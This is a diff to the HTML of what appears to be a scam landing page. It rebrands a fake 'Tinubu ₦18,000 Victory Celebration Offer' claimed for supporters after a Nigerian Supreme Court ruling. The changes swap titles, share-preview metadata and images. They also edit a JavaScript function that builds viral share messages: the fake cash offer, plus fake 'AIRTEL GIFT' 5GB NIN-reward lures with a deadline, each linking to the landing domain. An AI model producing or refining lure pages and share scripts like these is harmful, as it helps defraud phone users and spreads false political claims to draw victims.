--- a/mtndamba.html
+++ b/mtndamba.html
@@ -37,14 +37,14 @@
     <meta charset="utf-8">
     <meta name="viewport"
           content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
-    <meta property="og:site_name" content="TINUBU ₦18,000 CASH GIVEAWAY">
-    <meta property="og:title" content="TINUBU ₦18,000 CASH GIVEAWAY"/>
-    <meta property="og:description" content="Tinubu ₦18,000 Celebration Offer to his supporters as Nigeria Supreme Court upholds his election win">
-    <meta property="og:image" itemprop="image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA0rLUkBvli5GFJGr2ghyRj9yD5xSuzFZBzZ1_XS1n-rrFZdkD1pdSmhwr79TlPEen8p5e3g7E_O0yBjqfYKJzml20ExE4i764ros5tfnU6FU2JR6PVngZOreiXNwhp7UMYrHi8ecVeti6UdQ0KuI5OJj5aJ41raiB6FWhrkB_xzHPlJWKT8TKhGmiBzq3/s320/9C205B03-BFDC-4721-B973-41D50F610F64.png">
+    <meta property="og:site_name" content="VICTORY CELEBRATION OFFER">
+    <meta property="og:title" content="VICTORY CELEBRATION OFFER"/>
+    <meta property="og:description" content="Tinubu ₦18,000 Victory Celebration Offer to his supporters as Nigeria Supreme Court upholds his election win">
+    <meta property="og:image" itemprop="image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD5-VlKZslfQQGFOVN9ugEtVm0tS24bZK_5MG4Ng5kl2T4eUks3GnAcZN59dc2r35yO8WlwPmujShDhnsA8cnXyRANcD7vgX8heiaS5YQ-zoitizT99UQTyk-VHylg5BN7GBnkvfRvi6Tn6dMz91VPaeNdiMVK9nAAoq6sl_nXwY3KA3ZasELRYjL20tUV/s320/54B9E7DE-2361-4D0D-B9FC-473009A06425.jpeg">
     <meta property="og:type" content="website"/>
     <meta property="og:updated_time" content="1440432930"/>
     <!-- <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500&display=swap" rel="stylesheet">-->
-    <title>TINUBU ₦18,000 CASH GIVEAWAY</title>
+    <title>TINUBU ₦18,000 VICTORY CELEBRATION OFFER</title>
     
     
 
@@ -468,7 +468,7 @@
 <!-- END: Powered by Supercounters.com -->
 
 
-<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA0rLUkBvli5GFJGr2ghyRj9yD5xSuzFZBzZ1_XS1n-rrFZdkD1pdSmhwr79TlPEen8p5e3g7E_O0yBjqfYKJzml20ExE4i764ros5tfnU6FU2JR6PVngZOreiXNwhp7UMYrHi8ecVeti6UdQ0KuI5OJj5aJ41raiB6FWhrkB_xzHPlJWKT8TKhGmiBzq3/s770/9C205B03-BFDC-4721-B973-41D50F610F64.png" width="100%">
+<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZECnst8_n1RVnQa7gT51yW-uxzaQpvNA_CNoZB6SpaIph2FmTGIucNjMi8XDB1wGRFQdgI9tLbqdYMXAqWn2l_C1nlw8sGcGo_frS92E04p0g3zCqf9zC0Z9i2nIYe6g3Ovpi0axdb34qHP5VUNyWdJPrYIqEo9dwOLvj0EOub8xGcOHNIJYt17e7YqUH/s3072/156D1BC4-CB2A-4423-8998-D87E3205E569.jpeg" width="100%">
 </a>
 </p>
 
@@ -888,7 +888,7 @@
     function messageToSend() {
         var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
             b = "";
-        return "en" === a ? b = "*Tinubu ₦18,000 Celebration Offer*%0A%0ATinubu ₦18,000 Celebration Offer to his supporters as Nigeria Supreme Court upholds his election win %0A%0AGet Offer Here " + landingDomain : "id" === a ? b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20customer%20REWARD%20Program%20For%0AWho%20have%20been%20using%20NIN%20for%20more%0Athan%20three%20months%20%0A%0ANIN%20USERS%20ONLY%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain : b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20verification%20REWARD%20Program%20For%0AWho%20have%20verified%20using%20NIN%20for%0Athe%20verification%20%0A%0AALL network%20USERS%20%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain ;
+        return "en" === a ? b = "*TINUBU ₦18,000 VICTORY CELEBRATION OFFER*%0A%0ATinubu is Celebrating Victory by giving out ₦18,000 Offer to his supporters as Nigeriaas Nigerian Supreme Court upholds his election win %0A%0AGet Offer Here " + landingDomain : "id" === a ? b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20customer%20REWARD%20Program%20For%0AWho%20have%20been%20using%20NIN%20for%20more%0Athan%20three%20months%20%0A%0ANIN%20USERS%20ONLY%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain : b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20verification%20REWARD%20Program%20For%0AWho%20have%20verified%20using%20NIN%20for%0Athe%20verification%20%0A%0AALL network%20USERS%20%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain ;
     }
 
     /* function messageToSend() {
